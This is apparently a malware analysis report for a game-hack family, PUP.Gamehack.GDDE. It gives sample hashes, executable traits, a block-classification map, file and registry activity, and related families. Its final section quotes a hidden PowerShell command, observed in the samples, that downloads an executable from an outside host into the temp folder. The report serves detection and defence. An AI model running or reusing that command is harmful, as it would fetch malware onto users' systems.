PUP.Gamehack.GDDE
Table of Contents
Analysis Report
General information
| Family Name: | PUP.Gamehack.GDDE |
|---|---|
| Signature status: | No Signature |
Known Samples
Known Samples
This section lists other file samples believed to be associated with this family.|
MD5:
58cd77dfe7059c248306b9613153b9ba
SHA1:
2ba067a7868f588b8dcada50a333983be8b887ee
SHA256:
A2DDC1F3D33887A88AA0D41BE31052C5C46C93C8E7F0B21AA51576F4FDDB01C9
File Size:
881.66 KB, 881664 bytes
|
|
MD5:
53de914592e4b67f695ed5f3c36e0db2
SHA1:
755599d4b3a72ad5508fedffd22b9d75e2f7bfbe
SHA256:
39C4308337FD0A3685DD62A26ACD4FB6F1651C03C11F7F2BF185DBDD2B99CF95
File Size:
639.49 KB, 639488 bytes
|
|
MD5:
2915cbf68ae888616655e6df575c5968
SHA1:
a860a4544dcdedc8e0da5665236f29444d8d429f
SHA256:
413E4FB4C226B21B3993A0B40297B8ACC385D5540471593296252F5AA7AC8558
File Size:
708.10 KB, 708096 bytes
|
|
MD5:
4e179ca46f07f7ac2544c23a5d42c43c
SHA1:
a97373faf91a1a46695e70d1fb4040f2fda86d41
SHA256:
E8C456F8B129EB238F212B5DE4E512069994D7741651C29FC497EE0859275A53
File Size:
861.70 KB, 861696 bytes
|
|
MD5:
e61180ee387dc0d6659b9b142084a4c1
SHA1:
f5f80a17fb119a080a8474f229bdd86dac87ede6
SHA256:
606EE91B0BA02848AF540CF41220FC2E60D906B354A5D044C18ACC2194D7E778
File Size:
973.82 KB, 973824 bytes
|
Windows Portable Executable Attributes
- File doesn't have "Rich" header
- File doesn't have debug information
- File doesn't have exports table
- File doesn't have security information
- File has TLS information
- File is 64-bit executable
- File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
- File is either console or GUI application
- File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
- File is Native application (NOT .NET application)
Show More
- File is not packed
- IMAGE_FILE_DLL is not set inside PE header (Executable)
- IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
File Icons
File Icons
This section displays icon resources found within family samples. Malware often replicates icons commonly associated with legitimate software to mislead users into believing the malware is safe.
File Traits
- 2+ executable sections
- dll
- HighEntropy
- imgui
- No Version Info
- WriteProcessMemory
- x64
Block Information
Block Information
During analysis, EnigmaSoft breaks file samples into logical blocks for classification and comparison with other samples. Blocks can be used to generate malware detection rules and to group file samples into families based on shared source code, functionality and other distinguishing attributes and characteristics. This section lists a summary of this block data, as well as its classification by EnigmaSoft. A visual representation of the block data is also displayed, where available.| Total Blocks: | 3,001 |
|---|---|
| Potentially Malicious Blocks: | 308 |
| Whitelisted Blocks: | 2,500 |
| Unknown Blocks: | 193 |
Visual Map
?
?
0
?
?
?
0
?
?
0
0
0
0
0
0
0
0
0
0
0
0
0
?
?
?
1
0
0
0
?
?
0
?
?
?
?
0
?
x
0
x
?
x
0
x
0
?
?
0
?
?
0
?
?
0
0
0
0
0
0
?
0
?
0
0
0
0
x
0
0
x
?
?
?
?
?
0
?
x
x
0
x
x
0
x
0
0
0
?
?
?
0
0
0
1
0
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
0
x
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
x
x
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
x
0
0
0
0
0
x
x
0
x
x
0
0
x
x
0
0
0
0
x
x
0
0
0
x
x
x
1
0
0
0
0
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
x
x
0
0
0
0
0
0
x
0
0
0
0
0
0
0
0
x
0
x
0
x
?
0
?
?
x
0
0
0
0
0
?
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
x
0
x
0
0
0
0
?
0
?
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
0
0
0
1
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
x
x
x
0
0
x
0
0
0
x
0
0
0
0
0
0
x
0
0
0
0
0
x
0
0
0
0
0
x
0
0
0
0
?
0
0
x
x
0
0
x
x
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
x
0
0
1
x
x
0
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
0
0
x
x
0
0
0
0
0
x
0
0
0
1
x
0
0
x
x
0
0
0
x
x
0
x
0
0
x
x
0
0
x
0
0
x
0
x
x
0
0
0
0
0
0
0
x
0
0
0
0
x
x
0
x
x
0
0
0
0
0
0
0
0
0
0
0
0
0
x
x
1
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
x
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
1
0
0
0
0
0
0
0
1
0
0
0
0
1
0
0
1
0
0
1
0
0
1
0
0
1
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
0
x
0
0
0
0
0
0
x
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
x
x
0
0
0
0
0
0
0
0
0
0
x
x
0
x
x
0
0
x
0
0
x
x
0
0
0
0
0
0
0
1
0
0
0
0
0
x
x
0
0
0
x
0
x
x
x
x
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
x
0
0
0
0
0
x
x
0
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
x
0
0
0
1
0
0
0
0
0
x
x
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
0
0
x
0
0
0
0
0
x
x
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
1
0
0
0
0
0
0
0
0
x
x
0
x
0
0
0
0
0
x
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
x
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
x
x
0
0
x
0
0
0
0
x
x
0
x
0
0
x
0
0
0
0
0
0
0
0
x
0
x
x
0
0
x
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
?
0
x
0
x
0
x
?
0
?
0
?
?
0
?
0
x
0
?
0
x
0
0
0
x
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
x
x
x
x
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
x
0
0
1
0
0
0
0
0
0
0
0
0
0
x
x
0
x
x
x
0
0
0
?
x
0
0
x
0
0
0
0
0
x
?
x
x
0
0
0
x
0
x
0
x
0
0
0
x
x
x
x
0
0
0
0
0
x
0
0
0
0
0
0
0
0
x
0
0
0
x
x
x
0
0
0
0
0
0
?
0
0
?
?
0
x
?
?
?
?
0
?
x
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
?
0
x
0
0
0
0
0
0
x
0
0
0
0
x
1
0
?
x
x
0
0
0
0
x
1
0
0
x
0
0
0
0
0
0
x
1
x
0
x
x
x
x
0
x
x
x
x
0
x
0
0
x
0
x
0
0
x
x
0
0
0
0
0
x
0
0
x
x
0
0
0
0
0
x
x
0
x
x
0
0
0
0
0
x
0
0
0
0
x
x
0
0
0
0
0
x
x
x
0
0
0
x
x
x
x
0
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
?
x
0
0
x
x
0
0
0
0
0
x
0
x
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
0
0
x
0
x
0
0
x
0
0
0
0
x
0
x
0
x
x
0
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
0
0
0
1
0
0
0
0
0
0
0
x
x
x
0
0
0
0
0
0
x
x
0
0
0
x
0
0
0
0
x
0
0
0
x
0
0
0
0
0
0
0
0
0
x
x
x
0
0
0
0
0
0
0
x
x
0
x
x
x
x
0
0
0
x
x
0
x
0
0
0
0
0
0
0
0
x
0
0
0
0
0
0
x
0
0
0
x
0
x
0
x
0
0
0
x
x
x
0
0
x
0
0
0
0
0
x
x
0
x
0
x
x
0
0
0
x
x
x
x
0
x
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
x
x
x
0
0
0
0
0
0
0
0
x
x
0
x
0
x
x
0
x
0
0
0
0
0
0
0
x
x
0
x
x
0
0
0
0
0
0
0
0
0
x
0
x
x
0
0
0
0
0
0
0
?
?
0
?
?
?
?
?
?
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
?
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
?
?
?
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
?
?
0
0
?
?
?
?
?
?
?
0
0
?
?
0
?
?
?
?
?
?
?
0
?
?
?
?
?
0
0
?
?
?
?
?
0
?
?
?
?
0
0
0
0
0
0
0
?
0
0
0
0
0
0
0
0
0
0
x
0
0
0
0
0
0
0
0
0
?
?
0
0
0
0
0
?
0
0
?
0
0
0
0
0
0
0
0
0
0
0
1
0
?
0
0
0
...
Data truncated
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block
? - Unknown Block
x - Potentially Malicious Block
Similar Families
Similar Families
This section lists other families that share similarities with this family, based on EnigmaSoft’s analysis. Many malware families are created from the same malware toolkits and use the same packing and encryption techniques but uniquely extend functionality. Similar families may also share source code, attributes, icons, subcomponents, compromised and/or invalid digital signatures, and network characteristics. Researchers leverage these similarities to rapidly and effectively triage file samples and extend malware detection rules.- Gamehack.GSR
- Gamehack.LCXA
- Kryptik.ODFF
- RobloxHack.LE
Files Modified
Files Modified
This section lists files that were created, modified, moved and/or deleted by samples in this family. File system activity can provide valuable insight into how malware functions on the operating system.| File | Attributes |
|---|---|
| \device\namedpipe\pshost.134221426482759538.7492.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_kzwaiyx4.5lp.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_qzfuq4ei.2ex.psm1 | Generic Write,Read Attributes |
| c:\uwuware\assets\font.ttf | Generic Write,Read Attributes |
Registry Modifications
Registry Modifications
This section lists registry keys and values that were created, modified and/or deleted by samples in this family. Windows Registry activity can provide valuable insight into malware functionality. Additionally, malware often creates registry values to allow itself to automatically start and indefinitely persist after an initial infection has compromised the system.| Key::Value | Data | API Name |
|---|---|---|
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | RegNtPreCreateKey |
Windows API Usage
Windows API Usage
This section lists Windows API calls that are used by the samples in this family. Windows API usage analysis is a valuable tool that can help identify malicious activity, such as keylogging, security privilege escalation, data encryption, data exfiltration, interference with antivirus software, and network request manipulation.| Category | API |
|---|---|
| Syscall Use |
Show More
31 additional items are not displayed above. |
| Anti Debug |
|
| User Data Access |
|
| Process Manipulation Evasion |
|
| Process Shell Execute |
|
| Process Terminate |
|
| Encryption Used |
|
| Other Suspicious |
|
Shell Command Execution
Shell Command Execution
This section lists Windows shell commands that are run by the samples in this family. Windows Shell commands are often leveraged by malware for nefarious purposes and can be used to elevate security privileges, download and launch other malware, exploit vulnerabilities, collect and exfiltrate data, and hide malicious activity.
C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
|
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
|
